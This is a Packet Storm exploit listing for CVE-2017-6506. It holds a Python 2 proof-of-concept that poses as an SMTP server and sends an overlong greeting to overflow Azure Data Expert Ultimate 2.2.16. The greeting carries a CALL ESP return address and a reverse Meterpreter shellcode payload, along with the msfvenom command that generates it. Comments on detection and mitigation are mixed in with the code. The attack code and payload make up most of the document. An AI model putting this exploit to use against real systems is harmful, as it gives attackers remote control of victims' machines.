packetstormPeter BarisPACKETSTORM:141502
HistoryMar 07, 2017 - 12:00 a.m.

Azure Data Expert Ultimate 2.2.16 Buffer Overflow

2017-03-0700:00:00
Peter Baris
packetstormsecurity.com
34

EPSS

0.084

Percentile

94.4%

`# Exploit Title: Azure Data Expert Ultimate 2.2.16 a buffer overflow  
# Date: 2017-03-07  
# Exploit Author: Peter Baris  
# Vendor Homepage: http://www.saptech-erp.com.au  
# Software Link: http://www.azuredex.com/downloads.html  
# Version: 2.2.16  
# Tested on: Windows Server 2008 R2 Standard x64  
# CVE : CVE-2017-6506  
  
# The same method is used in the sysgauge exploit, this includes an extra check of the length of the shellcode parts.  
  
# Proof-of-concept for CVE-2017-6506 (see header): a stand-in SMTP server whose
# greeting line is the overflow payload. The flaw is in the product's handling
# of the server greeting, so the exposure is client-side: the application is
# only at risk when it connects to a mail server that is not trustworthy.
# Defensive notes: a legitimate SMTP 220 greeting is a short printable line;
# the one sent below is several hundred bytes (the payload comment says ~306
# bytes of shellcode plus padding) and largely non-printable, which is easy to
# flag in network monitoring. Mitigations are the vendor fix, restricting the
# application's outbound SMTP to known servers, and egress filtering for the
# reverse connection the payload is named after.
# NOTE(review): this is Python 2 syntax (print statement on the listen line).
import socket

# QtGui4.dll 0x6527635E - CALL ESP
# Little-endian encoding of the address named above. The technique relies on
# that module loading at a fixed address; presumably the DLL is built without
# ASLR support — cannot confirm from here. Rebasing/ASLR would defeat it.
jmp = "\x5e\x63\x27\x65"
nops = "\x90"*8


# reverse meterpreter shell 306 bytes long bad chars \x00\x0a\x0b\x20
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=4444 -f c -b \x00\x0a\x0d\x20 --smallest

# Opaque generated payload bytes, split into two parts that the buffer layout
# below places on either side of the return-address overwrite. Length guards
# further down bound part 1 below 236 bytes and part 2 below 76 bytes.
rev_met_1=("\x6a\x47\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1f\x2d"
"\x97\x97\x83\xeb\xfc\xe2\xf4\xe3\xc5\x15\x97\x1f\x2d\xf7\x1e"
"\xfa\x1c\x57\xf3\x94\x7d\xa7\x1c\x4d\x21\x1c\xc5\x0b\xa6\xe5"
"\xbf\x10\x9a\xdd\xb1\x2e\xd2\x3b\xab\x7e\x51\x95\xbb\x3f\xec"
"\x58\x9a\x1e\xea\x75\x65\x4d\x7a\x1c\xc5\x0f\xa6\xdd\xab\x94"
"\x61\x86\xef\xfc\x65\x96\x46\x4e\xa6\xce\xb7\x1e\xfe\x1c\xde"
"\x07\xce\xad\xde\x94\x19\x1c\x96\xc9\x1c\x68\x3b\xde\xe2\x9a"
"\x96\xd8\x15\x77\xe2\xe9\x2e\xea\x6f\x24\x50\xb3\xe2\xfb\x75"
"\x1c\xcf\x3b\x2c\x44\xf1\x94\x21\xdc\x1c\x47\x31\x96\x44\x94"
"\x29\x1c\x96\xcf\xa4\xd3\xb3\x3b\x76\xcc\xf6\x46\x77\xc6\x68"
"\xff\x72\xc8\xcd\x94\x3f\x7c\x1a\x42\x45\xa4\xa5\x1f\x2d\xff"
"\xe0\x6c\x1f\xc8\xc3\x77\x61\xe0\xb1\x18\xd2\x42\x2f\x8f\x2c"
"\x97\x97\x36\xe9\xc3\xc7\x77\x04\x17\xfc\x1f\xd2\x42\xfd\x1a"
"\x45\x57\x3f\xd9\xad\xff\x95\x1f\x3c\xcb\x1e\xf9\x7d\xc7\xc7"
"\x4f\x6d\xc7\xd7\x4f\x45\x7d\x98\xc0\xcd\x68\x42\x88\x47\x87"
"\xc1\x48\x45\x0e\x32\x6b\x4c")


rev_met_2=("\x68\x42\x9a\xed\xe3\x9b\xe0\x63"
"\x9f\xe2\xf3\x45\x67\x22\xbd\x7b\x68\x42\x75\x2d\xfd\x93\x49"
"\x7a\xff\x95\xc6\xe5\xc8\x68\xca\xa6\xa1\xfd\x5f\x45\x97\x87"
"\x1f\x2d\xc1\xfd\x1f\x45\xcf\x33\x4c\xc8\x68\x42\x8c\x7e\xfd"
"\x97\x49\x7e\xc0\xff\x1d\xf4\x5f\xc8\xe0\xf8\x96\x54\x36\xeb"
"\xe2\x79\xdc\x2d\x97\x97")


# Greeting body: 176 filler bytes, payload part 2, 2 more filler bytes, the
# CALL ESP address, 12 filler bytes, the NOP sled, then payload part 1.
buffer = "A"*176+rev_met_2+"A"*2+jmp+"B"*12+nops+rev_met_1
port = 25
s = socket.socket()
# Binds every interface on the SMTP port; any client reaching this host on
# 25/tcp receives the overlong greeting, not only the targeted application.
ip = '0.0.0.0'
s.bind((ip, port))
s.listen(5)


print 'Listening on SMTP port: '+str(port)
# Sanity guards on the payload split; both parts must fit the layout above.
if len(rev_met_1) >= 236:
print('[!] Shellcode part 1 is too long ('+str(len(rev_met_1))+'). Exiting.')
exit(1)
elif len(rev_met_2) >= 76:
print('[!] Shellcode part 2 is too long('+str(len(rev_met_2))+'). Exiting.')
exit(1)

# Serve forever: each connection gets the "220 <payload>\r\n" greeting and is
# closed immediately — no SMTP dialogue follows, which is itself a detection
# cue (a server that hangs up right after an oversized banner).
while True:
conn, addr = s.accept()
conn.send('220 '+buffer+'\r\n')
conn.close()
  
  
`
